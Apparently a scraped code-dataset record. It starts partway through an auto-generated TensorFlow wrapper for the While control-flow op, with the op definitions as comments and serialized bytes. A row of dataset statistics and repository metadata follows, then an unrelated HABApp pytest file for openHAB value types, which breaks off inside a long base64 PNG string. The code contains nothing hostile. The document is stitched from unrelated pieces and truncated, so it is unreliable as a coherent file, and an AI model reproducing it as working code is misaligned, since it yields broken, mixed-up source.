    return _op
  _inputs_flat = _op.inputs
  _attrs = ("T", _op.get_attr("T"), "cond", _op.get_attr("cond"), "body",
            _op.get_attr("body"), "output_shapes",
            _op.get_attr("output_shapes"), "parallel_iterations",
            _op.get_attr("parallel_iterations"))
  _execute.record_gradient(
      "While", _inputs_flat, _attrs, _result, name)
  return _result
# Raw-op alias: a thin pass-through to `_while`, exported as tf.raw_ops.While.
# `_kwarg_only` forces keyword-only invocation and `do_not_generate_docs`
# keeps the alias out of the generated API docs. The `[]` default here is
# only forwarded (never mutated), so the shared-mutable-default is benign.
def While(input, cond, body, output_shapes=[], parallel_iterations=10, name=None):
  return _while(input=input, cond=cond, body=body, output_shapes=output_shapes, parallel_iterations=parallel_iterations, name=name)
While.__doc__ = _while.__doc__
While = _doc_controls.do_not_generate_docs(_kwarg_only(While))
tf_export("raw_ops.While")(While)
def _while_eager_fallback(input, cond, body, output_shapes=None, parallel_iterations=10, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function _while
  """
  _ctx = ctx if ctx else _context.context()
  # FIX: the signature default used to be the mutable literal `[]` (a shared
  # object across all calls). `None` now serves as the sentinel; the existing
  # normalization below already handles it, so behavior is unchanged.
  if output_shapes is None:
    output_shapes = []
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'while' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  if parallel_iterations is None:
    parallel_iterations = 10
  parallel_iterations = _execute.make_int(parallel_iterations, "parallel_iterations")
  # Inputs may have mixed dtypes; convert them and capture the dtype list.
  _attr_T, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  _inputs_flat = list(input)
  _attrs = ("T", _attr_T, "cond", cond, "body", body, "output_shapes",
            output_shapes, "parallel_iterations", parallel_iterations)
  _result = _execute.execute(b"While", len(input), inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "While", _inputs_flat, _attrs, _result, name)
  return _result
def _InitOpDefLibrary(op_list_proto_bytes):
  """Build an OpDefLibrary from a serialized OpList proto.

  The parsed op definitions are also registered with the global op
  registry so the runtime can resolve them by name.
  """
  parsed_ops = _op_def_pb2.OpList()
  parsed_ops.ParseFromString(op_list_proto_bytes)
  _op_def_registry.register_op_list(parsed_ops)
  library = _op_def_library.OpDefLibrary()
  library.add_op_list(parsed_ops)
  return library
# op {
# name: "Case"
# input_arg {
# name: "branch_index"
# type: DT_INT32
# }
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "branches"
# type: "list(func)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# default_value {
# list {
# }
# }
# }
# is_stateful: true
# }
# op {
# name: "FakeParam"
# output_arg {
# name: "output"
# type_attr: "dtype"
# }
# attr {
# name: "dtype"
# type: "type"
# }
# attr {
# name: "shape"
# type: "shape"
# }
# }
# op {
# name: "For"
# input_arg {
# name: "start"
# type: DT_INT32
# }
# input_arg {
# name: "limit"
# type: DT_INT32
# }
# input_arg {
# name: "delta"
# type: DT_INT32
# }
# input_arg {
# name: "input"
# type_list_attr: "T"
# }
# output_arg {
# name: "output"
# type_list_attr: "T"
# }
# attr {
# name: "T"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "body"
# type: "func"
# }
# }
# op {
# name: "If"
# input_arg {
# name: "cond"
# type_attr: "Tcond"
# }
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tcond"
# type: "type"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "then_branch"
# type: "func"
# }
# attr {
# name: "else_branch"
# type: "func"
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# default_value {
# list {
# }
# }
# }
# is_stateful: true
# }
# op {
# name: "PartitionedCall"
# input_arg {
# name: "args"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "config"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "config_proto"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "executor_type"
# type: "string"
# default_value {
# s: ""
# }
# }
# }
# op {
# name: "RemoteCall"
# input_arg {
# name: "target"
# type: DT_STRING
# }
# input_arg {
# name: "args"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "f"
# type: "func"
# }
# is_stateful: true
# }
# op {
# name: "StatefulPartitionedCall"
# input_arg {
# name: "args"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "config"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "config_proto"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "executor_type"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "StatelessIf"
# input_arg {
# name: "cond"
# type_attr: "Tcond"
# }
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tcond"
# type: "type"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "then_branch"
# type: "func"
# }
# attr {
# name: "else_branch"
# type: "func"
# }
# }
# op {
# name: "StatelessWhile"
# input_arg {
# name: "input"
# type_list_attr: "T"
# }
# output_arg {
# name: "output"
# type_list_attr: "T"
# }
# attr {
# name: "T"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "cond"
# type: "func"
# }
# attr {
# name: "body"
# type: "func"
# }
# }
# op {
# name: "SymbolicGradient"
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "f"
# type: "func"
# }
# }
# op {
# name: "While"
# input_arg {
# name: "input"
# type_list_attr: "T"
# }
# output_arg {
# name: "output"
# type_list_attr: "T"
# }
# attr {
# name: "T"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "cond"
# type: "func"
# }
# attr {
# name: "body"
# type: "func"
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# default_value {
# list {
# }
# }
# }
# attr {
# name: "parallel_iterations"
# type: "int"
# default_value {
# i: 10
# }
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\242\001\n\004Case\022\020\n\014branch_index\030\003\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\032\n\010branches\022\nlist(func)(\0010\001\" \n\routput_shapes\022\013list(shape)\032\002\n\000\210\001\001\n;\n\tFakeParam\032\017\n\006output\"\005dtype\"\r\n\005dtype\022\004type\"\016\n\005shape\022\005shape\n`\n\003For\022\t\n\005start\030\003\022\t\n\005limit\030\003\022\t\n\005delta\030\003\022\n\n\005input2\001T\032\013\n\006output2\001T\"\021\n\001T\022\nlist(type)(\001\"\014\n\004body\022\004func\n\272\001\n\002If\022\r\n\004cond\"\005Tcond\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\r\n\005Tcond\022\004type\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\023\n\013then_branch\022\004func\"\023\n\013else_branch\022\004func\" \n\routput_shapes\022\013list(shape)\032\002\n\000\210\001\001\n\263\001\n\017PartitionedCall\022\013\n\004args2\003Tin\032\016\n\006output2\004Tout\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\t\n\001f\022\004func\"\024\n\006config\022\006string\032\002\022\000\"\032\n\014config_proto\022\006string\032\002\022\000\"\033\n\rexecutor_type\022\006string\032\002\022\000\nr\n\nRemoteCall\022\n\n\006target\030\007\022\013\n\004args2\003Tin\032\016\n\006output2\004Tout\"\025\n\003Tin\022\nlist(type)(\0010\001\"\026\n\004Tout\022\nlist(type)(\0010\001\"\t\n\001f\022\004func\210\001\001\n\276\001\n\027StatefulPartitionedCall\022\013\n\004args2\003Tin\032\016\n\006output2\004Tout\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\t\n\001f\022\004func\"\024\n\006config\022\006string\032\002\022\000\"\032\n\014config_proto\022\006string\032\002\022\000\"\033\n\rexecutor_type\022\006string\032\002\022\000\210\001\001\n\236\001\n\013StatelessIf\022\r\n\004cond\"\005Tcond\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\r\n\005Tcon
d\022\004type\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\023\n\013then_branch\022\004func\"\023\n\013else_branch\022\004func\nX\n\016StatelessWhile\022\n\n\005input2\001T\032\013\n\006output2\001T\"\021\n\001T\022\nlist(type)(\001\"\014\n\004cond\022\004func\"\014\n\004body\022\004func\nj\n\020SymbolicGradient\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\025\n\003Tin\022\nlist(type)(\0010\001\"\026\n\004Tout\022\nlist(type)(\0010\001\"\t\n\001f\022\004func\n\224\001\n\005While\022\n\n\005input2\001T\032\013\n\006output2\001T\"\021\n\001T\022\nlist(type)(\001\"\014\n\004cond\022\004func\"\014\n\004body\022\004func\" \n\routput_shapes\022\013list(shape)\032\002\n\000\"\036\n\023parallel_iterations\022\003int\032\002\030\n\210\001\001")
| 38.089692 | 2,788 | 0.663252 | 7,698 | 56,906 | 4.630813 | 0.053131 | 0.033326 | 0.010604 | 0.011109 | 0.850511 | 0.83079 | 0.815558 | 0.795837 | 0.769636 | 0.761081 | 0 | 0.025932 | 0.218659 | 56,906 | 1,493 | 2,789 | 38.115204 | 0.775814 | 0.306505 | 0 | 0.702983 | 1 | 0.010376 | 0.129958 | 0.043822 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044099 | false | 0.014267 | 0.024643 | 0.014267 | 0.14786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
6b3de89a0b8b5ab6133219c9fa755c1383318fd3 | 62,075 | py | Python | tests/test_openhab/test_values.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 44 | 2018-12-13T08:46:44.000Z | 2022-03-07T03:23:21.000Z | tests/test_openhab/test_values.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 156 | 2019-03-02T20:53:31.000Z | 2022-03-23T13:13:58.000Z | tests/test_openhab/test_values.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 18 | 2019-03-08T07:13:21.000Z | 2022-03-22T19:52:31.000Z | import pytest
from HABApp.openhab.definitions import HSBValue, OnOffValue, OpenClosedValue, PercentValue, QuantityValue, RawValue, \
UpDownValue
from HABApp.openhab.definitions import ITEM_DIMENSIONS
@pytest.mark.parametrize(
    "cls,values", [
        (UpDownValue, (UpDownValue.DOWN, UpDownValue.UP)),
        (OnOffValue, (OnOffValue.ON, OnOffValue.OFF)),
        (OpenClosedValue, (OpenClosedValue.OPEN, OpenClosedValue.CLOSED)),
    ]
)
def test_val_same_type(cls, values):
    # Wrapping a value of the matching type must leave it unchanged.
    for raw in values:
        wrapped = cls(raw)
        assert wrapped.value == raw
@pytest.mark.parametrize(
    "cls,values", [
        (PercentValue, (('0', 0.0), ('5', 5.0), ('55.5', 55.5), ('100.0', 100), )),
        (HSBValue, (
            ('0,0,0', (0, 0, 0)), ('5,0,0', (5, 0, 0)),
            ('100.0,0,360', (100, 0, 360)), ('0,100.0,180', (0, 100, 180))
        )),
    ]
)
def test_val_convert(cls, values):
    # Each pair is (raw openHAB string, expected parsed value).
    for raw, expected in values:
        assert cls(raw).value == expected
def test_quantity_value():
    """QuantityValue must split a '<number> <unit>' string into its parts."""
    unit_of_dimension = {
        'Length': 'm', 'Temperature': '°C', 'Pressure': 'hPa', 'Speed': 'km/h', 'Intensity': 'W/m²', 'Angle': '°',
        'Dimensionless': '',
    }
    sample_numbers = (-103.3, -3, 0, 0.33535, 5, 55.5, 105.5)
    for dimension in ITEM_DIMENSIONS:
        unit = unit_of_dimension[dimension]  # constant per dimension, hoisted
        for number in sample_numbers:
            parsed = QuantityValue(f'{number} {unit}')
            assert parsed.value == number
            assert parsed.unit == unit
def test_raw_type_png():
data = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPwAAAD8CAYAAABTq8lnAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFIGlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDAgNzkuMTYwNDUxLCAyMDE3LzA1LzA2LTAxOjA4OjIxICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxOCAoTWFjaW50b3NoKSIgeG1wOkNyZWF0ZURhdGU9IjIwMTgtMDgtMTdUMTQ6MTc6NTAtMDQ6MDAiIHhtcDpNb2RpZnlEYXRlPSIyMDE4LTA4LTIwVDA3OjM4OjIzLTA0OjAwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDE4LTA4LTIwVDA3OjM4OjIzLTA0OjAwIiBkYzpmb3JtYXQ9ImltYWdlL3BuZyIgcGhvdG9zaG9wOkNvbG9yTW9kZT0iMyIgcGhvdG9zaG9wOklDQ1Byb2ZpbGU9InNSR0IgSUVDNjE5NjYtMi4xIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjE5OTJjOTljLTYxM2MtNDAzNS1hMzdlLTg0ZTNkMDFmNDczNiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDoxOTkyYzk5Yy02MTNjLTQwMzUtYTM3ZS04NGUzZDAxZjQ3MzYiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDoxOTkyYzk5Yy02MTNjLTQwMzUtYTM3ZS04NGUzZDAxZjQ3MzYiPiA8eG1wTU06SGlzdG9yeT4gPHJkZjpTZXE+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjcmVhdGVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjE5OTJjOTljLTYxM2MtNDAzNS1hMzdlLTg0ZTNkMDFmNDczNiIgc3RFdnQ6d2hlbj0iMjAxOC0wOC0xN1QxNDoxNzo1MC0wNDowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTggKE1hY2ludG9zaCkiLz4gPC9yZGY6U2VxPiA8L3htcE1NOkhpc3Rvcnk+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+ZnQQuAAANOZJREFUeJztnXd4FNX6xz+zJZuQBBIIifQEEFCqVAVBqXJRBG4geAGVK4KIFUSuys8uIKhYaNeKIjaQq4gFERCUK1WkqBRD7+lA6m525/fHiBfSdnZ3Znd293yeZx5l85
5z3mz2u3PmnPe8ryTLMgKBIDwwBdoBgUDgP4TgBYIwQgheIAgjhOAFgjBCCF4gCCOE4AWCMEIIXiAII4TgBYIwQgheIAgjhOAFgjBCCF4gCCOE4AWCMEIIXiAII4TgBYIwQgheIAgjhOAFgjBCCF4gCCMs7gwkSfKHH+GCBUgGUoAaQCwQ8+d/AQouuk4Bh4HjQKmf/RSECGUzWrkVvMBrIoGrgeuBDkAzFKFbPezHCRwFtgNbgS1/XgVaOSoII2RZrvISeEQK8BiwHigGZJ2uEuBb4L4/xxQIKqScnoXgfSYBuAf4Cf0E7u76L/BPIFrn31UQZAjBa0djYB5QSOCEXvY6B8wBGuj4ewuCCCF432kJfISykBZogVd22YG3gCY6vQeCIEEI3nvigFcBB4EXtNqrBJiJshMgCEOE4D1HAsYCmQRewN5eJ4ERWr8xAuMjBO8ZScBKAi9Yra6lQE1N3yGBoSmrZ8mdqMM48OZvwLtAopadRkdHk5ycTL169YiJiaFatWpERyuL60VFRRQVFZGTk8OJEyc4efIk586d03J4UO72twFrtO5YYDzK6lsIvjwSMA145M//9xqr1UqbNm3o3LkznTp1olmzZiQkJHjUx6lTp9iyZQtbtmxh06ZNnDhxwheXLlAKjAMWatGZwLgIwVdNBMpd/R/edmCxWOjevTs33XQTvXr1IioqSjPnAE6ePMnmzZv5/PPP2bx5s6/dPQbM0MAtgUERgq+cOOBz4DpvGickJHDbbbeRlpZGXFychm5Vzr59+1i0aBErVqzAbrd7280c4EHApZljAsMgBF8xccD3QDtPG1522WVMmDCBwYMHExERobVfqsjNzWXJkiUsWrSI7Oxsb7pYAtyKsn8vCCGE4MsTDawCunrSyGazMWbMGMaOHav5tN1bzp49y6xZs1i2bJk3zdcCNwFF2nolCCRC8JcSAXwJ9PWkUZcuXZg+fTr16tXTxysf2bRpE48//jjHjh3ztOl/gGGI6X3IIAR/KYtQprKqsFgs3H///dx5552YTMbOHVJcXMycOXNYuHAhLpdH+n0JmKyTWwI/IwT/P8YDC9Qa16xZk/nz59OuXTv9PNKBNWvWMGnSJEpKSjxpNgZ4RyeXBH5ECF6hE7ABZUrvlpSUFN58803q16+vr1c6sX37dsaPH+9JEE8h0BHYo59XAn8gBA/Vgd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
